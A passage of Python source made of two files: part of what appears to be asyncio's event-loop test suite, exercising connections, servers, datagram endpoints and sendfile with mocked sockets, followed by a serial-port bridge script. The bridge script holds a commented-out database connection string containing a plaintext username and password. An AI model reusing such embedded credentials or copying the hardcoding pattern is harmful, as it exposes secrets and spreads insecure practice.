def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuseport_supported:
try:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
reuseport_supported = False
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_reuse_address_error(self):
# bpo-37228: Ensure that explicit passing of `reuse_address=True`
# raises an error, as it is not safe to use SO_REUSEADDR when using UDP
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(coro)
def test_create_datagram_endpoint_reuse_address_warning(self):
# bpo-37228: Deprecate *reuse_address* parameter
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False)
with self.assertWarns(DeprecationWarning):
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
yield from ()
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
@asyncio.coroutine
def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
bridge.py
|
#!/usr/bin/env python
import sys
import time
import serial
import queue
import threading
import re
from sqlalchemy import *
from sqlalchemy.orm import *
from ..database import db
class Bridge():
def __init__(self, from_hw_queue, device_id, sensors):
# self.device = device
self.sensors = sensors
self.device_id = device_id
self.from_hw = from_hw_queue
self.to_hw = queue.Queue()
self.running = True
self.serialport = '/dev/ttyUSB0'
self.serialrate = 9600
self.myserial = None
self.stopped = True
self.test = False
self.output = True
# self.engine = create_engine('mysql+pymysql://thehub:cas0iWur@localhost:3306/hubdb_test')
# self.session = sessionmaker(bind=self.engine)()
# session_factory = db.sessionmaker(bind=db.engine)
# Session = db.scoped_session(session_factory)
# self.session = Session()
# self.session = db.session
if self.test:
self.fromhwtest = queue.Queue()
if self.output:
self.f = open('bridge_file.txt', 'a')
self.start()
#stop, send the kill message to the thread
def stop(self):
self.to_hw.put_nowait("kill")
def start(self):
if self.output:
self.f.write("starting\n")
#check that required information is set
if ((self.from_hw != None) and (self.serialport != None) and (self.serialrate != None) and self.stopped):
if (self.test):#testing
mythread = threading.Thread(target=self.theprocess)
if self.output:
self.f.write("starting process\n")
mythread.start()
else:
#setup serial and start thread
self.myserial = serial.Serial(self.serialport, self.serialrate, timeout=1)
if (self.myserial.isOpen()):
if self.output:
self.f.write("serial is open\n")
mythread = threading.Thread(target=self.theprocess)
mythread.start()
else:
#kick and scream
if (self.from_hw == None):
print("from Hardware queue not yet set")
if (self.serialport == None):
print("Serial Port not set")
if (self.serialrate == None):
print("Serial Rate not set")
if not(self.stopped):
print("Already running");
def theprocess(self):
self.stopped = False
self.running = True
while self.running:
#message for hardware
if (not(self.to_hw.empty())):
msg = str(self.to_hw.get_nowait())
if self.output:
self.f.write(" [*] Writing message to hardware: " + msg + "\n")
if (msg == 'kill'):
self.running = False
if self.output:
self.f.write(" Got a kill command\n")
else:
if (not(self.test)):
self.myserial.write(bytes(msg, 'UTF-8'))
if self.output:
self.f.write(" [*] Wrote message to hardware: " + msg + "\n")
if (not(self.test)):#not a test
hw_msg = self.myserial.readline().decode('utf8')
# if (hw_msg != b''):#got a message from the hardward
if (hw_msg!=""):#got a message from the hardward
if self.output:
self.f.write(" [x] Got message from hardware: " + hw_msg + "\n")
print(" [x] Got message from hardware: " + hw_msg + "\n")
self.from_hw.put_nowait(self.translate_message_fromhw(hw_msg))
else:#is a test
if (not( self.fromhwtest.empty())):
hw_msg = self.fromhwtest.get()
if self.output:
print (" [x] Got test message from hardware: " + hw_msg)
self.from_hw.put_nowait(self.translate_message_fromhw(hw_msg))
if (not(self.test)):#not a test, clean up
self.myserial.close()
self.stopped = True
def send_message(self, themessage):
#translated_message = translate_message_tohw(themessage)
print ("message from hardware")
if self.output:
print (" [x] Got message to pass to hardware: " + themessage)
if themessage == "kill":
self.to_hw.put_nowait("kill")
else:
#default behavior get all
for somesensor in self.sensors:
#print(somesensor.pin)
if re.match("[A-Z][A-Z0-9]",somesensor.pin):
self.to_hw.put_nowait(somesensor.pin);
else:
print("Bad sensor ID: "+somesensor.pin)
#place holding for message translation
def translate_message_tohw (themessage):
print ("message to hardware")
#do some translating eventually
outmessage = themessage
return outmessage
def translate_message_fromhw (self,themessage):
#do some translating
outmessage = ""
if themessage[0] == "V":
print("sensor: "+themessage[1:3])
#get appropriate sensor object
#db.session.commit()
